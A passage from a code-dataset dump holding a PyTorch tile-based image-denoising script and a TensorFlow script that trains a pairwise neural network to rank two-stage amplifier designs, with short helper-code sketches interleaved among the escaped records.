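# the prefix-stripping approach, for reference:
def strip_module_prefix(state_dict):
    # {'module.conv.weight': ...} -> {'conv.weight': ...}
    return {(k[7:] if k.startswith('module.') else k): v
            for k, v in state_dict.items()}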
it puts BatchNorm and Dropout layers into inference mode)\nmodel.eval()\n\n# Sets data type according to CPU or GPU modes\n# dtype = torch.cuda.FloatTensor\ndtype = torch.FloatTensor\n\ndef noise(imorig):\n    imorig = np.expand_dims(imorig, 0)\n\n    # Handle odd sizes\n    expanded_h = False\n    expanded_w = False\n    sh_im = imorig.shape\n    if sh_im[2] % 2 == 1:\n        expanded_h = True\n        imorig = np.concatenate((imorig, imorig[:, :, -1, :][:, :, np.newaxis, :]), axis=2)\n    #\n    if sh_im[3] % 2 == 1:\n        expanded_w = True\n        imorig = np.concatenate((imorig, imorig[:, :, :, -1][:, :, :, np.newaxis]), axis=3)\n\n    imorig = normalize(imorig)\n    imorig = torch.Tensor(imorig)\n\n    # Add noise\n\n    imnoisy = imorig.clone()\n\n    # with torch.no_grad(): # PyTorch v0.4.0\n    imorig, imnoisy = Variable(imorig.type(dtype), volatile=True), \\\n        Variable(imnoisy.type(dtype), volatile=True)\n    nsigma = Variable( \\\n        torch.FloatTensor([25 / 255.]).type(dtype), volatile=True)\n\n    # Measure runtime\n\n    # Estimate noise and subtract it from the input image\n    im_noise_estim = model(imnoisy, nsigma)\n    outim = torch.clamp(imnoisy - im_noise_estim, 0., 1.)\n\n    if expanded_h:\n        imorig = imorig[:, :, :-1, :]\n        outim = outim[:, :, :-1, :]\n        imnoisy = imnoisy[:, :, :-1, :]\n\n    if expanded_w:\n        imorig = imorig[:, :, :, :-1]\n        outim = outim[:, :, :, :-1]\n        imnoisy = imnoisy[:, :, :, :-1]\n\n    # Save images\n\n    outimg = variable_to_cv2_image(outim)\n\n    return outimg\n\n\ndef clean_noise(input):\n    imorig = np.array(Image.fromarray(input).convert('RGB')).transpose(2, 0, 1)\n    img_shape = imorig.shape\n    h = 200\n    num_h = img_shape[1] // h\n    ori_h = h * num_h\n    crop_h = img_shape[1] - ori_h\n    img_shape_1 = img_shape[1]\n    w = 200\n    num_w = img_shape[2] // w\n    ori_w = w * num_w\n    crop_w = img_shape[2] - ori_w\n    img_shape_2 = img_shape[2]\n    images = []\n    if crop_h == 0:\n        img_shape_1 = img_shape_1 + 1\n        imorig = cv2.resize(imorig.transpose(1, 2, 0), (imorig.shape[2], imorig.shape[1] + 1)).transpose(2, 0, 1)\n        crop_h = 1\n    if crop_w == 0:\n        img_shape_2 = img_shape_2 + 1\n        imorig = cv2.resize(imorig.transpose(1, 2, 0), (imorig.shape[2] + 1, imorig.shape[1])).transpose(2, 0, 1)\n        crop_w = 1\n    for i in range(num_h + 1):\n        for j in range(num_w + 1):\n            # pick the tile: bottom-right corner, bottom edge, right edge or\n            # interior; without elif/else the interior slice overwrote the\n            # edge/corner tiles\n            if i == num_h and j == num_w:\n                img1 = imorig[:, i * int(h):i * int(h) + crop_h, j * int(w):j * int(w) + crop_w]\n            elif i == num_h:\n                img1 = imorig[:, i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)]\n            elif j == num_w:\n                img1 = imorig[:, i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w]\n            else:\n                img1 = imorig[:, i * int(h):(i + 1) * int(h), j * int(w):(j + 1) * int(w)]\n            images.append([i, j, img1])\n    denoise_images = []\n    for index, i in enumerate(images):\n        denoise_images.append([i[0], i[1], noise(i[2])])\n    new_img = np.zeros((img_shape_1, img_shape_2, 3))\n    for img in denoise_images:\n        i, j = img[:2]\n        # place each denoised tile back; edge/corner tiles are resized to the\n        # remainder region they came from (same elif/else fix as above)\n        if i == num_h and j == num_w:\n            img[2] = cv2.resize(img[2], (\n                new_img[int(i) * h:(int(i) + 1) * h + crop_h, int(j) * w:(int(j) + 1) * w + crop_w].shape[-2::-1]))\n            new_img[i * int(h):i * int(h) + crop_h, j * int(w):j * int(w) + crop_w] = img[2]\n        elif i == num_h:\n            img[2] = cv2.resize(img[2],\n                                (new_img[i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)].shape[-2::-1]))\n            new_img[i * int(h):i * int(h) + crop_h, j * int(w):(j + 1) * int(w)] = img[2]\n        elif j == num_w:\n            img[2] = cv2.resize(img[2],\n                                (new_img[i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w].shape[-2::-1]))\n            new_img[i * int(h):(i + 1) * int(h), j * int(w):j * int(w) + crop_w] = img[2]\n        else:\n            new_img[int(i) * h:(int(i) + 1) * h, int(j) * w:(int(j) + 1) * w] = img[2]\n    # new_img = evaluate(new_img)\n    # image_path = request.args.get('filepath').split('/')\n    # image_path[2] = 'clean'\n    # new_image_path = '//172.30.20.157/project' + '/'.join(image_path[:-1])\n    # if not os.path.exists(new_image_path):\n    #     os.makedirs(new_image_path)\n    # new_image_path = new_image_path + '/' + image_path[-1]\n    # Image.fromarray(new_img.astype(np.uint8)).save(new_image_path, dpi=(300., 300.), quality=60)\n    return new_img
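# The tiling bookkeeping in clean_noise, reduced to its core (sketch): split a
# length into fixed-size tiles plus one remainder tile, as (start, stop) pairs.
def tile_bounds(length, tile):
    bounds = [(k * tile, (k + 1) * tile) for k in range(length // tile)]
    if length % tile:
        bounds.append((length - length % tile, length))
    return bounds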
\nimorig = Image.open('th (1).jpg')\nimorig = np.array(imorig)\nimg = clean_noise(imorig)\nImage.fromarray(img.astype(np.uint8)).save('333333.png')\n# if __name__ == \"__main__\":\n#     app.config.KEEP_ALIVE = False\n#     app.config.REQUEST_TIMEOUT = 900\n#     app.config.RESPONSE_TIMEOUT = 900\n#     app.run(host='0.0.0.0', port=8003)\n","sub_path":"ffdent_api.py","file_name":"ffdent_api.py","file_ext":"py","file_size_in_byte":10847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"20849432","text":"import numpy as np\nimport tensorflow as tf\nimport math\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport pickle\n\nfrom framework.wrapper import TwoStageComplete as sim\n\n# np.random.seed(10)\n# random.seed(10)\n\neval_core = sim.EvaluationCore(\"./framework/yaml_files/two_stage_full.yaml\")\ndef evaluate_individual(individual, verbose=False):\n    # TODO\n    # returns a scalar number representing the cost function of that individual\n    # return (sum(individual),)\n    mp1_idx = int(individual[0])\n    mn1_idx = int(individual[1])\n    mn3_idx = int(individual[2])\n    mp3_idx = int(individual[3])\n    mn5_idx = int(individual[4])\n    mn4_idx = int(individual[5])\n    cc_idx = int(individual[6])\n    result = eval_core.cost_fun(mp1_idx, mn1_idx, mp3_idx, mn3_idx, mn4_idx, mn5_idx, cc_idx, verbose=verbose)\n    return result\n\ndef generate_data_set(n=10, evaluate=True):\n    if evaluate:\n        print(\"[info] generating %d random data\" %n)\n    data_set, cost_set, bw_set, gain_set , ibias_set = [], [], [], [], []\n\n    for _ in range(n):\n\n        mp1_idx = random.randint(0 ,len(eval_core.mp1_vec)-1)\n        mn1_idx = random.randint(0 ,len(eval_core.mn1_vec)-1)\n        mn3_idx = random.randint(0 ,len(eval_core.mn3_vec)-1)\n        mp3_idx = random.randint(0 ,len(eval_core.mp3_vec)-1)\n        mn5_idx = random.randint(0 ,len(eval_core.mn5_vec)-1)\n        mn4_idx = random.randint(0 ,len(eval_core.mn4_vec)-1)\n        cc_idx = random.randint(0 ,len(eval_core.cc_vec)-1)\n\n        sample_dsn = [mp1_idx, mn1_idx, mn3_idx, mp3_idx, mn5_idx, mn4_idx, cc_idx]\n        data_set.append(sample_dsn)\n        if evaluate:\n            result = evaluate_individual(sample_dsn, verbose=False)\n            cost = result[0]\n            cost_set.append(cost)\n\n\n    if evaluate:\n        return np.array(data_set), np.array(cost_set)\n    else:\n        # no simulation requested, so there is no cost array to return\n        return np.array(data_set), None\n\n# data generation and preprocessing. 
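# The per-parameter randint loop in generate_data_set above, written as one
# vectorized draw (sketch; the table sizes come from eval_core):
def sample_designs(table_sizes, n):
    # one column of random indices per device parameter
    return np.stack([np.random.randint(0, s, size=n) for s in table_sizes],
                    axis=1)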
for new environments these numbers should be readjusted\nn_init_samples = 200\nn_new_samples = 10\nnum_designs = 2\nnum_features_per_design = 7\nnum_classes = 2\nnum_nn_features = num_designs * num_features_per_design\nvalid_frac = 0.2\nmax_n_retraining = 15\n\nk_top = 10 #during training only consider comparison between k_top ones and the others\nref_dsn_idx = k_top #during inference compare new randomly generated samples with this design in the sorted dataset\n\n# training settings\nnum_epochs = 100\nbatch_size = 8\ndisplay_step = 10\nckpt_step = 10\n\nsummary_dir = 'genetic_nn/summary'\n\n\n# nn hyper parameters\nnhidden1 = 20 # number of hidden nodes\nnhidden2 = 20\nnhidden3 = 20\n\nlearning_rate = 0.03\ndecay_steps = 10000\ndecay_rate = 0.5\n\nl2_reg_scale = 0.003\nDROP_OUT_PROB = 0.5\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n # tf.set_random_seed(10)\n tf_train_dataset = tf.placeholder(tf.float32, shape=(None, num_nn_features), name='train_in')\n tf_train_labels = tf.placeholder(tf.float32, shape=(None, num_classes), name='train_labels')\n loss_weights = tf.placeholder(tf.float32, shape=[None, 1], name='adjustment_weights')\n keep_prob = tf.placeholder(tf.float32)\n\n with tf.variable_scope('normalizer'):\n mu = tf.Variable(tf.zeros([num_nn_features], dtype=tf.float32), name='training_set_mu', trainable=False)\n std = tf.Variable(tf.zeros([num_nn_features], dtype=tf.float32), name='training_set_std', trainable=False)\n tf_train_dataset_norm = (tf_train_dataset - mu) / (std + 1e-6)\n with tf.variable_scope(\"regulizer\"):\n l2_reg_fn = tf.contrib.layers.l2_regularizer(l2_reg_scale, scope=\"l2_reg\")\n\n\n def nn_model(input_data, name='nn_model', reuse=False, is_test=False):\n with tf.variable_scope(name):\n layer1 = tf.contrib.layers.fully_connected(input_data, nhidden1, reuse=reuse, scope='fc1',\n weights_regularizer=l2_reg_fn)\n do1 = tf.nn.dropout(layer1, keep_prob)\n layer2 = tf.contrib.layers.fully_connected(do1, nhidden2, reuse=reuse, scope='fc2',\n weights_regularizer=l2_reg_fn)\n do2 = tf.nn.dropout(layer2, keep_prob)\n layer3 = tf.contrib.layers.fully_connected(do2, nhidden3, reuse=reuse, scope='fc3',\n weights_regularizer=l2_reg_fn)\n do3 = tf.nn.dropout(layer3, keep_prob)\n logits = tf.contrib.layers.fully_connected(do3, num_classes,\n activation_fn=None,\n weights_regularizer=l2_reg_fn,\n reuse=reuse, scope='fc_out')\n return logits\n\n with tf.variable_scope('regulizer'):\n reg_losses = tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)\n reg_loss = tf.reduce_sum(reg_losses)\n\n train_logits = nn_model(tf_train_dataset_norm, name='train_nn')\n train_prediction = tf.nn.softmax(train_logits)\n with tf.variable_scope(\"loss\"):\n likelihoods = tf.nn.softmax_cross_entropy_with_logits(labels=tf_train_labels,\n logits=train_logits)\n weighted_likelihoods = tf.multiply(likelihoods, loss_weights)\n loss = tf.reduce_mean(weighted_likelihoods) + reg_loss\n\n with tf.variable_scope(\"optimizer\"):\n # global_step = tf.Variable(0, name='global_step', trainable=False)\n # starter_learning_rate = learning_rate\n # lr = tf.train.exponential_decay(learning_rate, global_step, decay_steps, decay_rate, staircase=True)\n # optimizer = tf.train.GradientDescentOptimizer(lr).minimize(loss, global_step=global_step)\n # tf.summary.scalar('learning_rate', learning_rate)\n # tf.summary.scalar('lr', lr)\n optimizer = tf.train.AdamOptimizer().minimize(loss)\n\n\n def accuracy(predictions, labels, name='accuracy'):\n with tf.variable_scope(name):\n # predicted_label = 
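# The 'normalizer' scope above, in isolation (sketch): dataset mean/std live in
# the graph as non-trainable variables and are assigned once the training data
# is known, so a restored checkpoint normalizes inputs exactly as during
# training.
import tensorflow as tf

def normalized_input(num_features):
    x = tf.placeholder(tf.float32, [None, num_features])
    mu = tf.Variable(tf.zeros([num_features]), trainable=False, name='mu')
    std = tf.Variable(tf.ones([num_features]), trainable=False, name='std')
    return x, mu, std, (x - mu) / (std + 1e-6)
# after computing train_mean/train_std from the data:
#     session.run([mu.assign(train_mean), std.assign(train_std)])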
tf.cast(tf.greater(predictions, 0.99999), tf.float32)\n # correct_predictions = tf.equal(predicted_label, labels)\n correct_predictions = tf.equal(tf.argmax(predictions, axis=1), tf.argmax(labels, axis=1))\n accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n return accuracy\n\n tf_training_accuracy = accuracy(train_prediction, tf_train_labels, name='train_accuracy')\n\n # validation prediction\n tf_valid_dataset = tf.placeholder(tf.float32, shape=(None, num_nn_features), name='valid_in')\n tf_valid_labels = tf.placeholder(tf.float32, shape=(None, num_classes), name='valid_labels')\n with tf.variable_scope('normalizer', reuse=True):\n tf_valid_dataset_norm = (tf_valid_dataset - mu) / (std + 1e-6)\n valid_logits = nn_model(tf_valid_dataset_norm, name='train_nn', reuse=True)\n\n valid_prediction = tf.nn.softmax(valid_logits)\n valid_accuracy = accuracy(valid_prediction, tf_valid_labels, name='validation_accuracy')\n # summarize a couple of things\n tf.summary.scalar(\"train_loss\", loss)\n tf.summary.scalar(\"train_accuracy\", tf_training_accuracy)\n tf.summary.scalar(\"validation_accuracy\", valid_accuracy)\n\n # summarize weights and biases\n all_vars= tf.global_variables()\n def get_var(name):\n for i in range(len(all_vars)):\n if all_vars[i].name.startswith(name):\n return all_vars[i]\n return None\n tf.summary.histogram(\"fc1_weight\", get_var('train_nn/fc1/weights'))\n tf.summary.histogram(\"fc1_biases\", get_var('train_nn/fc1/biases'))\n tf.summary.histogram(\"fc2_weight\", get_var('train_nn/fc2/weights'))\n tf.summary.histogram(\"fc2_biases\", get_var('train_nn/fc2/biases'))\n tf.summary.histogram(\"fc3_weight\", get_var('train_nn/fc3/weights'))\n tf.summary.histogram(\"fc3_biases\", get_var('train_nn/fc3/biases'))\n tf.summary.histogram(\"fc_out_weight\", get_var('train_nn/fc_out/weights'))\n tf.summary.histogram(\"fc_out_biases\", get_var('train_nn/fc_out/biases'))\n\n # inference phase\n merged_summary = tf.summary.merge_all()\n\nclass BatchGenerator(object):\n def __init__(self, data_set, labels, weights, batch_size):\n self._data_set = data_set\n self._labels = labels\n self._weights = weights\n self._data_size = data_set.shape[0]\n self._batch_size = batch_size\n self._segment = self._data_size // batch_size\n self.last_index = 0\n\n def next(self):\n\n if ((self.last_index+1)*self._batch_size > self._data_size):\n data1 = self._data_set[self.last_index * self._batch_size:,:]\n data2 = self._data_set[:((self.last_index+1)*self._batch_size)%self._data_size, :]\n labels1 = self._labels[self.last_index * self._batch_size:, :]\n labels2 = self._labels[:((self.last_index+1)*self._batch_size)%self._data_size, :]\n weights1 = self._weights[self.last_index * self._batch_size:]\n weights2 = self._weights[:((self.last_index+1)*self._batch_size)%self._data_size]\n batch_data = np.concatenate((data1, data2), axis=0)\n batch_labels = np.concatenate((labels1, labels2), axis=0)\n batch_weights = np.concatenate((weights1, weights2), axis=0)\n else:\n batch_data = self._data_set[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size, :]\n batch_labels = self._labels[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size, :]\n batch_weights = self._weights[self.last_index * self._batch_size:(self.last_index + 1) * self._batch_size]\n\n self.last_index = (self.last_index+1) % (self._segment+1)\n return batch_data, batch_labels, batch_weights\n\ndef combine(dataset, cost, for_training=False):\n # this combine function is used when 
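# The wrap-around logic in BatchGenerator above can also be written with
# modular indexing; a compact generator doing the same tour (sketch):
import numpy as np

def cyclic_batches(data, labels, weights, batch_size):
    n, i = len(data), 0
    while True:
        idx = np.arange(i, i + batch_size) % n
        yield data[idx], labels[idx], weights[idx]
        i = (i + batch_size) % n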
generating nn data for training\n # label [0 1] means design1 is \"sufficiently\" worse than than design2 (e.g cost1 is at\n # least %10 higher than cost2) and label [1 0] means it is not the case.\n # it is really important to combine those pairs that are going to be useful during inference\n # since during inference one of the designs is always good we should make sure that during training also\n # this bias on some level exists. For this reason we will sort the data set and produce pairs that always have at least\n # one design from top k_top designs.\n\n assert k_top < len(dataset)\n\n sorted_indices = sorted(range(len(cost)), key=lambda x: cost[x])\n sorted_dataset = dataset[sorted_indices]\n sorted_cost = cost[sorted_indices]\n\n category = []\n nn_dataset, nn_labels = [], []\n cost_arr = [] # just for debbuging purposes\n\n # adjustment weights are for adjusting the difference in the number of samples that are like (x0,x1) where\n # both x0 and x1 are good with the samples that have at least one bad x.\n adjustment_weights = []\n num_both_good_comparisons = k_top*(k_top-1)/2\n n = len(sorted_dataset)\n num_one_bad_comparisons = n*(n-1)/2 - (n-k_top) * (n-k_top-1)/2\n\n # weights_good = (num_one_bad_comparisons)#/(num_one_bad_comparisons+num_both_good_comparisons)\n weights_good = 1\n # weights_bad = (num_both_good_comparisons)#/(num_one_bad_comparisons+num_both_good_comparisons)\n weights_bad = 1\n\n for i in range(k_top):\n for j in range(i+1, len(sorted_dataset)):\n # (x0,x1) (x0,x2) ... x0 is always going to be the first one going into nn but we also want to have x0\n # to be the second term. so the probability of having (x0,x1) and (x1,x0) is equal.\n\n # if random.random() < 0.5:\n # nn_dataset.append(list(sorted_dataset[i,:])+list(sorted_dataset[j,:]))\n # cost_arr.append([sorted_cost[i], sorted_cost[j]])\n # label = 1 if (sorted_cost[i] > sorted_cost[j]) else 0\n # else:\n # nn_dataset.append(list(sorted_dataset[j,:])+list(sorted_dataset[i,:]))\n # cost_arr.append([sorted_cost[j], sorted_cost[i]])\n # label = 1 if (sorted_cost[j] > sorted_cost[i]) else 0\n\n # (x0,x1) part\n nn_dataset.append(list(sorted_dataset[i,:])+list(sorted_dataset[j,:]))\n cost_arr.append([sorted_cost[i], sorted_cost[j]])\n label = 1 if (sorted_cost[i] > sorted_cost[j]) else 0\n if j < k_top:\n adjustment_weights.append(weights_good)\n\n else:\n adjustment_weights.append(weights_bad)\n category.append(label)\n\n # (x1,x0) part\n nn_dataset.append(list(sorted_dataset[j,:])+list(sorted_dataset[i,:]))\n cost_arr.append([sorted_cost[j], sorted_cost[i]])\n label = 1 if (sorted_cost[j] > sorted_cost[i]) else 0\n if j < k_top:\n adjustment_weights.append(weights_good)\n else:\n adjustment_weights.append(weights_bad)\n category.append(label)\n\n\n\n nn_labels = np.zeros((len(category), num_classes))\n nn_labels[np.arange(len(category)), category] = 1\n return np.array(nn_dataset), np.array(nn_labels), np.array(cost_arr), np.array(adjustment_weights)\n\ndef shuffle_dataset(dataset, labels):\n \"\"\"\n :param dataset: this is suppose to be a list of individuals\n :param labels: this is a numpy array\n :return:\n \"\"\"\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\ndef train(session, dataset, cost, writer, num_epochs=10, batch_size=128):\n all_vars = tf.global_variables()\n saver = tf.train.Saver(all_vars)\n nn_dataset, nn_labels, cost_arr, adjustment_weights = combine(dataset, 
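# Core of the pairing scheme described above, stripped of the weighting detail
# (sketch): every pair (i, j) with i among the k_top cheapest designs yields
# two ordered rows, (xi|xj) and (xj|xi), labelled 1 when the first design has
# the higher (worse) cost.
import numpy as np

def make_pairs(X, cost, k_top):
    order = np.argsort(cost)
    Xs, cs = X[order], np.asarray(cost)[order]
    rows, labels = [], []
    for i in range(k_top):
        for j in range(i + 1, len(Xs)):
            rows.append(np.concatenate([Xs[i], Xs[j]]))
            labels.append(int(cs[i] > cs[j]))
            rows.append(np.concatenate([Xs[j], Xs[i]]))
            labels.append(int(cs[j] > cs[i]))
    return np.array(rows), np.array(labels)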
cost)\n\n print(\"[Debug_data] design1, design2, costs, label\")\n\n # for i in range(len(nn_dataset)):\n # design1 = nn_dataset[i, :num_features_per_design]\n # design2 = nn_dataset[i, num_features_per_design:]\n # costs = cost_arr[i,:]\n # label = nn_labels[i,:]\n # print(\"[Debug_data] {} -> {} -> {} -> {}\".format(design1, design2, costs, label))\n # nn_dataset, nn_labels = shuffle_dataset(nn_dataset, nn_labels) # Do we really need to shuffle? yes we do :)\n\n\n permutation = np.random.permutation(nn_labels.shape[0])\n nn_dataset = nn_dataset[permutation]\n nn_labels = nn_labels[permutation]\n adjustment_weights = adjustment_weights[permutation]\n\n # print(\"[Debug_shuffle] sample -> label \")\n # for i in range(len(nn_dataset)):\n # print(\"[Debug_shuffle] {} -> {} \" .format(nn_dataset[i], nn_labels[i]))\n\n boundry_index = nn_dataset.shape[0] - int(nn_dataset.shape[0]*valid_frac)\n train_dataset = nn_dataset[:boundry_index]\n train_labels = nn_labels[:boundry_index]\n valid_dataset = nn_dataset[boundry_index:]\n valid_labels = nn_labels[boundry_index:]\n\n train_weights = adjustment_weights[:boundry_index]\n valid_weights = adjustment_weights[boundry_index:]\n\n data_dict = {'train_input': train_dataset,\n 'train_labels': train_labels,\n 'valid_input': valid_dataset,\n 'valid_labels': valid_labels}\n\n with open('genetic_nn/checkpoint/two_stage/train_valid_data.pkl', 'wb') as f:\n pickle.dump(data_dict, f)\n\n # find the mean and std of dataset for normalizing\n train_mean = np.mean(train_dataset, axis=0)\n train_std = np.std(train_dataset, axis=0)\n\n print(\"[info] dataset size:%d\" %len(dataset))\n print(\"[info] combine size:%d\" %len(nn_dataset))\n print(\"[info] train_dataset: positive_samples/total ratio : %d/%d\" %(np.sum(train_labels, axis=0)[0], train_labels.shape[0]))\n print(\"[info] valid_dataset: positive_samples/total ratio : %d/%d\" %(np.sum(valid_labels, axis=0)[0], valid_labels.shape[0]))\n\n batch_generator = BatchGenerator(train_dataset, train_labels, train_weights, batch_size)\n print(\"[info] training the model with dataset ....\")\n\n total_n_batches = int(len(train_dataset) // batch_size)\n print(\"[info] number of total batches: %d\" %total_n_batches)\n print(30*\"-\")\n\n tf.global_variables_initializer().run()\n mu.assign(train_mean).op.run()\n std.assign(train_std).op.run()\n\n for epoch in range(num_epochs):\n avg_loss = 0.\n avg_train_acc = 0.\n avg_valid_acc = 0.\n feed_dict = {}\n for iter in range(total_n_batches):\n batch_data, batch_labels, batch_weights = batch_generator.next()\n drop_out_prob = DROP_OUT_PROB\n feed_dict = {tf_train_dataset :batch_data,\n tf_train_labels :batch_labels,\n tf_valid_dataset :valid_dataset,\n tf_valid_labels :valid_labels,\n keep_prob :drop_out_prob,\n loss_weights :batch_weights[:, None]}\n\n _, l, valid_acc, train_acc= session.run([optimizer, loss, valid_accuracy, tf_training_accuracy],\n feed_dict=feed_dict)\n avg_loss += l / total_n_batches\n avg_train_acc += train_acc / total_n_batches\n avg_valid_acc += valid_acc / total_n_batches\n\n s = session.run(merged_summary, feed_dict=feed_dict)\n\n # sample_input = np.array([[19, 38, 220, 55], [43, 10, 26, 25]])\n # sample_predictions = session.run(train_prediction, feed_dict={tf_train_dataset: sample_input})\n # print(\"[Debug] sample_prediction {}, {}\".format(sample_predictions[0], sample_predictions[1]))\n writer.add_summary(s, epoch)\n if epoch % ckpt_step == 0:\n saver.save(session, 'genetic_nn/checkpoint/two_stage/checkpoint.ckpt')\n dict_to_save = 
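# The three parallel permutations above (dataset, labels, weights) as one
# helper (sketch):
import numpy as np

def shuffle_together(*arrays):
    perm = np.random.permutation(len(arrays[0]))
    return tuple(a[perm] for a in arrays)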
dict(dataset=dataset, cost=cost)\n with open('genetic_nn/checkpoint/two_stage/data.pkl', 'wb') as f:\n pickle.dump(dict_to_save, f)\n if epoch % display_step == 0:\n print(\"[epoch %d] loss: %f\" %(epoch, avg_loss))\n print(\"train_acc = %.2f%%, valid_acc = %.2f%%\" %(avg_train_acc*100, avg_valid_acc*100))\n\ndef plot_cost1d(range, dataset, cost):\n cost_min, cost_max = range\n plt.figure(1)\n plt.hist(cost, 50)\n plt.title('distribution of cost function')\n plt.figure(2)\n plt.hist(dataset[:,0], 50)\n plt.title('distribution of res_idx')\n plt.figure(3)\n plt.hist(dataset[:,1], 50)\n plt.title('distribution of mul_idx')\n plt.show()\n\ndef find_dsns_with_cost(cost_range, data_set, cost_set):\n \"\"\"\n\n :param cost_range:\n :param data_set:\n :param cost_set:\n :return:\n\n >>> find_dsns_with_cost([0.6,0.7], dataset, cost)\n\n \"\"\"\n indices = []\n for i in range(len(cost_set)):\n if cost_set[i] < cost_range[1] and cost_set[i] > cost_range[0]:\n indices.append(i)\n return indices\n\ndef combine2(design_arr1, cost_arr1, design_arr2, cost_arr2):\n # this combine function is used when doing inference\n # what this does it combines the two design arrs and produce the corresponding inputs to nn.\n # but also makes sure in the pairs generated, there is always one design from design_arr1, and one other is from\n # design_arr2\n\n nn_dataset = []\n cost_arr = []\n category = []\n\n for i in range(len(design_arr1)):\n for j in range(len(design_arr2)):\n\n if random.random() < 0.5:\n nn_dataset.append(list(design_arr1[i,:])+list(design_arr2[j,:]))\n cost_arr.append([cost_arr1[i], cost_arr2[j]])\n label = 1 if (cost_arr1[i] > cost_arr2[j]) else 0\n else:\n nn_dataset.append(list(design_arr2[j,:])+list(design_arr1[i,:]))\n cost_arr.append([cost_arr2[j], cost_arr1[i]])\n label = 1 if (cost_arr2[j] > cost_arr1[i]) else 0\n\n category.append(label)\n nn_labels = np.zeros((len(category), num_classes))\n nn_labels[np.arange(len(category)), category] = 1\n return np.array(nn_dataset), np.array(nn_labels), np.array(cost_arr)\n\n\ndef test_model2(session, training_dataset, training_cost):\n\n n_samples = 1000\n\n # generate the designs\n if os.path.exists('genetic_nn/checkpoint/two_stage/test_data.pkl'):\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'rb') as f:\n read_data = pickle.load(f)\n new_designs, new_cost = read_data['dataset'], read_data['cost']\n else:\n new_designs, new_cost = generate_data_set(n_samples)\n write_data = dict(dataset=new_designs, cost=new_cost)\n with open('genetic_nn/checkpoint/two_stage/test_data.pkl', 'wb') as f:\n pickle.dump(write_data, f)\n\n # sort training data_set\n sorted_indices = sorted(range(len(training_cost)), key=lambda x: training_cost[x])\n sorted_training_designs = training_dataset[sorted_indices]\n sorted_training_cost = training_cost[sorted_indices]\n\n nn_inputs, nn_labels, design_costs = combine2(sorted_training_designs[k_top-1:k_top],\n sorted_training_cost[k_top-1:k_top],\n new_designs, new_cost)\n drop_out_prob = 1\n feed_dict = {tf_train_dataset: nn_inputs,\n tf_train_labels: nn_labels,\n keep_prob: drop_out_prob}\n predictions, = session.run([train_prediction], feed_dict=feed_dict)\n\n for i in range(ref_dsn_idx):\n print(\"[Debug_test] dataset: {} -> {}\".format(sorted_training_designs[i], sorted_training_cost[i]))\n print(\"[Debug_test] ref design in dataset {} cost {}\".format(sorted_training_designs[ref_dsn_idx-1],\n sorted_training_cost[ref_dsn_idx-1]))\n print(\"[Debug_test] design1, design2, costs, label, prediction, 
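# The pickle cache-or-generate pattern used for test_data.pkl above, factored
# out (sketch; the path layout is the project's own):
import os
import pickle

def load_or_generate(path, generate):
    if os.path.exists(path):
        with open(path, 'rb') as f:
            return pickle.load(f)
    data = generate()
    with open(path, 'wb') as f:
        pickle.dump(data, f)
    return data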
correctness\")\n\n good_design_miss_cnt = 0\n good_design_caught_cnt = 0\n bad_design_miss_cnt = 0\n bad_design_caught_cnt = 0\n for i in range(len(nn_inputs)):\n design1 = nn_inputs[i, :num_features_per_design]\n design2 = nn_inputs[i, num_features_per_design:]\n costs = design_costs[i, :]\n label = nn_labels[i, :]\n prediction = predictions[i, :]\n predicted_label = 0\n if np.argmax(prediction) == np.argmax(label):\n # this is a correct prediction (caught design)\n predicted_label = 1\n # cnt += 1\n if sorted_training_cost[k_top-1] < costs[0] or sorted_training_cost[k_top-1] < costs[1]:\n # bad_design_caught_cnt\n bad_design_caught_cnt += 1\n elif sorted_training_cost[k_top-1] > costs[0] or sorted_training_cost[k_top-1] > costs[1]:\n # good_design_caught_cnt\n good_design_caught_cnt += 1\n else:\n # this is a miss classification\n if sorted_training_cost[k_top-1] < costs[0] or sorted_training_cost[k_top-1] < costs[1]:\n # bad_design_miss_cnt\n bad_design_miss_cnt += 1\n elif sorted_training_cost[k_top-1] > costs[0] or sorted_training_cost[k_top-1] > costs[1]:\n # good_design_miss_cnt\n good_design_miss_cnt += 1\n\n print(\"[Debug_test] {} -> {} -> {} -> {} -> {} -> {} \".format(list(design1), list(design2), costs, label, prediction, predicted_label))\n\n\n print(\"[Debug_test] accuracy = {}/{} = {}\".format(good_design_caught_cnt+bad_design_caught_cnt,n_samples,\n 1.0*(good_design_caught_cnt+bad_design_caught_cnt)/n_samples))\n\n print(\"[Debug_test] good_design recall accuracy = {}/{} = {}\".format(good_design_caught_cnt,\n good_design_caught_cnt+good_design_miss_cnt,\n 1.0*good_design_caught_cnt/(good_design_caught_cnt+good_design_miss_cnt)))\n print(\"[Debug_test] bad_design recall accuracy = {}/{} = {}\".format(bad_design_caught_cnt,\n bad_design_caught_cnt+bad_design_miss_cnt,\n 1.0*bad_design_caught_cnt/(bad_design_caught_cnt+bad_design_miss_cnt)))\n\n print(\"[Debug_test] good_design precision accuracy = {}/{} = {}\".format(good_design_caught_cnt,\n good_design_caught_cnt+bad_design_miss_cnt,\n 1.0*good_design_caught_cnt/(good_design_caught_cnt+bad_design_miss_cnt)))\n print(\"[Debug_test] bad_design precision accuracy = {}/{} = {}\".format(bad_design_caught_cnt,\n bad_design_caught_cnt+good_design_miss_cnt,\n 1.0*bad_design_caught_cnt/(bad_design_caught_cnt+good_design_miss_cnt)))\n\n\ndef test_model(session, training_dataset, training_cost):\n\n select_indices = []\n\n # plot_cost1d([0,3], training_dataset, training_cost)\n\n n_samples = 1000\n\n # generate the designs\n new_designs, new_cost = generate_data_set(n_samples)\n # sort them according to cost function for simplicity\n sorted_indices = sorted(range(len(new_cost)), key=lambda x: new_cost[x])\n sorted_designs = new_designs[sorted_indices]\n sorted_cost = new_cost[sorted_indices]\n\n # In here we should select the ones we care about and combine them 